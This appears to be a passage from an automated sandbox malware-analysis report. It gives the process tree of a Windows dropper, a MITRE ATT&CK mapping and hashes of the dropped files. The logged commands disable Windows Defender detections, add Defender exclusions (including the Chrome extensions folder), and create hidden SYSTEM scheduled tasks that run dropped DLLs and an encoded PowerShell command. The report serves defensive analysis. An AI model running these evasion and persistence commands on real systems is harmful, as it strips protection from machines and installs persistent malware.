C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3312
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:596 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:323⤵PID:4288
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:324⤵PID:3020
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:643⤵PID:4968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:323⤵PID:4624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:643⤵PID:220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:323⤵PID:4076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:643⤵PID:4540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:323⤵PID:3876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:643⤵PID:2868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:323⤵PID:1480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:643⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:323⤵PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:643⤵PID:4596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:323⤵PID:2848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:643⤵PID:1576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:323⤵PID:4004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:643⤵PID:2532
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJMBcvCaW" /SC once /ST 18:27:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJMBcvCaW"2⤵PID:4056
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1748
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJMBcvCaW"2⤵PID:4320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 17:59:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\wXyVQwS.exe\" KS /vMsite_iduTf 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyWbuVQzPmDmgkCMH"2⤵PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4860
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2848
-
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2296
-
-
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\wXyVQwS.exeC:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\wXyVQwS.exe KS /vMsite_iduTf 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:2372 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"2⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4240
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1212
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4020
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\kunRDm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\exZibaI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ztlTbPYifermRZH"2⤵PID:3720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ztlTbPYifermRZH"2⤵PID:4436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\NnXXDql.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3492 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4288
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\ufiowBU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\XdocruQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\jNcfuKN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 06:12:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\OIkNSqKA\fLkiqZd.dll\",#1 /Vssite_idnBE 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "HKFMMLmWpeGdwIqGl"2⤵PID:412
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2792
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:3704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4328 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4640
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"2⤵PID:4544
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\OIkNSqKA\fLkiqZd.dll",#1 /Vssite_idnBE 3851181⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1028 -
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\OIkNSqKA\fLkiqZd.dll",#1 /Vssite_idnBE 3851182⤵PID:1048
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"3⤵PID:4000
-
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:520
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:3572
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3792
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
3Disable or Modify Tools
2Modify Registry
4Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.2MB
MD5df280925e135481b26e921dd1221e359
SHA1877737c142fdcc03c33e20d4f17c48a741373c9e
SHA256710a3e1beda67e1c543ba04423bfb0ba643815582310c0b3d03d03e071c894b8
SHA5123da682a655a9df0ad0fcc6f28953f104383f3abe695afdd7a236d9ea0f05ef4de210da7c46139f3ce01e3e7dde9abf02b3665d1289e20426ba9164468807f487
-
Filesize
5.2MB
MD5df280925e135481b26e921dd1221e359
SHA1877737c142fdcc03c33e20d4f17c48a741373c9e
SHA256710a3e1beda67e1c543ba04423bfb0ba643815582310c0b3d03d03e071c894b8
SHA5123da682a655a9df0ad0fcc6f28953f104383f3abe695afdd7a236d9ea0f05ef4de210da7c46139f3ce01e3e7dde9abf02b3665d1289e20426ba9164468807f487
-
Filesize
5.2MB
MD5df280925e135481b26e921dd1221e359
SHA1877737c142fdcc03c33e20d4f17c48a741373c9e
SHA256710a3e1beda67e1c543ba04423bfb0ba643815582310c0b3d03d03e071c894b8
SHA5123da682a655a9df0ad0fcc6f28953f104383f3abe695afdd7a236d9ea0f05ef4de210da7c46139f3ce01e3e7dde9abf02b3665d1289e20426ba9164468807f487
-
Filesize
1.2MB
MD52630b80d764250a9ef860472c2f3542b
SHA15172e7a2354b921ed17f7f44ff9bebfc6db97316
SHA256c32d6fe5e1feacb46b5f25d25759d1011edb6c4c81d57d593d3af4fd8cda71a4
SHA512269cd53864a46cbc9c50588f0a425f5c52e786f8de07ea9d8696287e84cdcf9c61ba9a516a865a0c04034e430a07a4a51d75e88230ed8f9501278776af3fec24
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD51465529ccdddb3836c10cf839386395b
SHA1c8fdae4cc011243b292711c695cf6bad5c6a90fe
SHA256c701b450ea8d6fde52de497b1348d111ee0498e70516db3edab012319e30de1b
SHA5125c618eb5ae131ef0041973b7e7422578501174211d7ec5d0670201c344189328a769d147208d55c7c0b0a25268263f82a0c0bb0428bc3398539f7f7764515d3f
-
Filesize
27KB
MD51731d4ac08227a982172ddbade591905
SHA1bf6ececb97722cfc94192d7907ce976f51c9f877
SHA2561c1ce117d2168458595a89d10901ccd7f3b3383d5bab9e9a9875b783886eb650
SHA512866e003b84ad51ac61d41fd374b28259b8ef08dd1643833d05cc8fe8d1ac53699a31be741dc90d27cb25d26440efe34cc305cb92412a30c1a99e34ae0d8ee352
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
Filesize
19KB
MD5a5ea84c923abfee2962b8597a654fca6
SHA1c482bc7d5ce5ebc83a32e27cd546fba6b0fa76a9
SHA2566cd0ee59b53f69fd8e131abd1e217f1272736a3b349d6669f8caad823ede8162
SHA5124782e3cb2814f11401085c5e6c9f961972ae0d6ab06a969593050034f351a50df898eb112149e8fa88545eb6e389a6b1e266951f22f6936fa7005da7775cde89
-
Filesize
1KB
MD51f5029c2ea2ccf7939855315f3f43b3f
SHA1b49e0b60a493dd2e613d02a2a3042374916ac416
SHA2563e5f32e1b8305d696518cbdf5cac46aa928444acd2613ecb0c9d302931af37d0
SHA51252188c2a6cf6b08ed61f4a25fbac7fa48be58ca012f110f443b41c6200a9da53f9867cccaf2cb539f159f4e6dae64dd5a5242610025f7a26eeb163cba443ad78
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\additional_file0.tmp
Filesize1.9MB
MD5b0f128c3579e6921cfff620179fb9864
SHA160e19c987a96182206994ffd509d2849fdb427e3
SHA2561c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA51217977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
Filesize1.9MB
MD5b0f128c3579e6921cfff620179fb9864
SHA160e19c987a96182206994ffd509d2849fdb427e3
SHA2561c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA51217977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
Filesize1.9MB
MD5b0f128c3579e6921cfff620179fb9864
SHA160e19c987a96182206994ffd509d2849fdb427e3
SHA2561c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
